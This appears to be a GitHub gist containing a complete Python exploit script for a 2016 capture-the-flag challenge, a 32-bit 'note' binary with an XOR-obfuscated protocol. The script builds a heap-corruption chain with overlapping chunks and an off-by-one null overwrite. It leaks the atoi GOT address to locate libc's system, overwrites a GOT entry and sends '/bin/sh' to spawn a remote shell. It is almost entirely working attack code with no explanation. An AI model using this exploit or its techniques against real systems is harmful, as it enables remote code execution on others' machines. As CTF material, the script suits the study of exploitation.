Created
December 19, 2016 06:38
-
-
Save peternguyen93/3c279d11a633f2ac8e5f84d6038009fc to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Pwn 500 WhitehatGrangrix 2016 | |
from Pwn import * | |
# p = Pwn(elf='./note') | |
p = Pwn(elf='./note',host='118.70.186.203',port=23501) | |
key_1 = [ | |
0xd49f6a35,0xa8733e09,0x7c4712dd,0x501be6b1, | |
0x24efba85,0xf8c38e59,0xcc97622d,0xa06b3601, | |
0x743f0ad5,0x4813dea9,0x1ce7b27d,0xf0bb8651, | |
0xc48f5a25,0x98632ef9,0x6c3702cd,0x400bd6a1, | |
0x14dfaa75,0xe8b37e49,0xbc87521d,0x905b26f1, | |
0x642ffac5,0x3803ce99,0x0cd7a26d,0xe0ab7641, | |
0xb47f4a15,0x88531ee9,0x5c27f2bd,0x30fbc691, | |
0x04cf9a65,0xd8a36e39,0xac77420d,0x004b16e1, | |
0x00000000,0x00000000,0x00000000,0x00000000, | |
0x00000000,0x00000000,0x20202020,0x20202020, | |
0x20202020,0x20202020,0x20202020,0x20202020, | |
0x20202020,0x20202020,0x20202020,0x20202020, | |
0x20202020,0x20202020,0x20202020,0x20202020, | |
0x20202020,0x0a202020,0x6d202020,0x20206d6d, | |
0x20202020,0x20202020,0x20202020,0x20202020, | |
0x20202020,0x20202020,0x20202320,0x6d6d6d6d | |
] | |
key = [p.p32(l) for l in key_1] | |
# key = [p.p32(l) for l in key] | |
key = ''.join(key) | |
key = [ord(c) for c in key] | |
def decrypt(data): | |
data = data.decode('hex') | |
data = [ord(c) for c in data] | |
for i in xrange(0,len(data)): | |
if data[i] <= 0x7f: | |
t = 0 | |
else: | |
t = 0x80 | |
c = key[(i % 128) + t] ^ data[i] | |
if data[i] <= 0x7f: | |
c = c % 128 | |
data[i] = c | |
return ''.join([chr(c % 256) for c in data]) | |
def encrypt(data): | |
if len(data) == 0: | |
return '' | |
data = [ord(c) for c in data] | |
for i in xrange(0,len(data)): | |
if data[i] <= 0x7f: | |
t = 0 | |
else: | |
t = 0x80 | |
c = key[(i % 128) + t] ^ data[i] | |
if data[i] <= 0x7f: | |
c = c % 128 | |
data[i] = c | |
return ''.join([chr(c % 256) for c in data]).encode('hex').upper() | |
cmd = encrypt('cmd #:') | |
size_note = encrypt('Enter size Note #: ') | |
name_note = encrypt('Name Note #:') | |
data_note = encrypt('Date #: ') | |
body_note = encrypt('Body #: ') | |
index_free = encrypt('Index Free#: ') | |
index_read = encrypt('Index #:') | |
index_edit = encrypt('Index Edit#:') | |
def list_note(): | |
p.read_until(cmd) | |
p.sendline(encrypt('list')) | |
out = p.read_until(cmd) | |
p.sendline('\n') | |
out = out.split('\n') | |
output = '' | |
for o in out: | |
output += decrypt(o) | |
return output | |
def read_note(idx): | |
p.read_until(cmd) | |
p.sendline(encrypt('read')) | |
p.read_until(index_read) | |
p.sendline(encrypt(str(idx))) | |
out = p.read_until(cmd) | |
p.sendline('\n') | |
out = out.split('\n') | |
output = '' | |
for o in out: | |
output += decrypt(o) | |
return output | |
def free_note(idx): | |
p.read_until(cmd) | |
p.sendline(encrypt('free')) | |
p.read_until(index_free) | |
p.sendline(encrypt(str(idx))) | |
def add_note(name,date,body,size): | |
p.read_until(cmd) | |
p.sendline(encrypt('add')) | |
p.read_until(size_note) | |
p.sendline(encrypt(str(size))) | |
p.read_until(name_note) | |
p.sendline(encrypt(name)) | |
p.read_until(data_note) | |
p.sendline(encrypt(date)) | |
p.read_until(body_note) | |
p.sendline(encrypt(body)) | |
def edit_note(idx,name,date,body): | |
p.read_until(cmd) | |
p.sendline(encrypt('edit')) | |
p.read_until(index_edit) | |
p.sendline(encrypt(str(idx))) | |
p.read_until(name_note) | |
p.sendline(encrypt(name)) | |
p.read_until(data_note) | |
p.sendline(encrypt(date)) | |
p.read_until(body_note) | |
p.sendline(encrypt(body)) | |
def exploit(): | |
p.connect() | |
add_note('A'*30,'C'*15,'D'*76,76) | |
add_note('E'*30,'F'*15,'G'*460 + p.pack(0x41),464) | |
add_note('F'*30,'Q'*15,'K'*208,208) | |
add_note('T'*30,'M'*15,'K'*208,208) | |
stage = 'D'*40 + p.pA(0,0x89) | |
stage+= 'D'*4 + p.pack(0x804f6a0 - 8) #fake chunk->bck | |
add_note('A'*30,'C'*15,stage,56) | |
add_note('W'*30,'F'*15,'C'*79 + '\n',80) | |
add_note('T'*30,'M'*15,'K'*208,208) | |
free_note(1) | |
edit_note(0,'A'*30,'C'*15,'K'*44) # overwrite note[1]->size | |
add_note('T'*30,'F'*15,'C'*320,320) | |
add_note('Y'*30,'F'*15,'C'*79 + '\n',80) | |
free_note(1) | |
free_note(2) | |
stage1 = 'A'*320 | |
stage1+= p.pA(0,0x89) | |
stage1+= 'A'*4 + 'C'*4 | |
stage1+= 'P'*(0x88 - 16) | |
stage1+= p.pA(0,0x81) | |
stage1 = stage1.ljust(464,'\xC0') | |
add_note('E','F'*15,stage1,464) # overwrite note 7 | |
add_note('T'*30,'M'*15,'K'*208,208) | |
free_note(7) | |
free_note(5) | |
# print list_note() | |
stage1 = 'A'*320 | |
stage1+= p.pA(0,0x89) + 'A'*4 + '\n' | |
edit_note(1,'X'*30,'Z'*15,stage1) # off byte null overwrite chunk->bck | |
# after this add, notes->list = main_arena->bins 5 or 6 | |
add_note('K'*30,'F'*15,'C'*79 + '\n',80) | |
stage3 = 'A'*4 | |
stage3+= p.pA( | |
1, | |
32, | |
p.got['atoi'], | |
1, | |
32, | |
p.got['strcspn'] | |
) | |
stage3 = stage3.ljust(79,'C') | |
add_note('A'*30,'F'*15,stage3 + '\n',80) | |
out = read_note(11) | |
idx = out.find('\xf7') | |
atoi = p.unpack(out[idx - 3:idx + 1]) | |
system = atoi - p.get_libc_offset(atoi,'atoi') | |
print hex(atoi) | |
print hex(system) | |
p.read_until(cmd) | |
p.sendline(encrypt('edit')) | |
p.read_until(index_edit) | |
p.sendline(encrypt(str(12))) | |
p.read_until(name_note) | |
payload = p.pack(system) + '\n' | |
p.sendline(encrypt(payload)) | |
p.read_until(data_note) | |
p.sendline('/bin/sh') | |
p.io() | |
exploit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment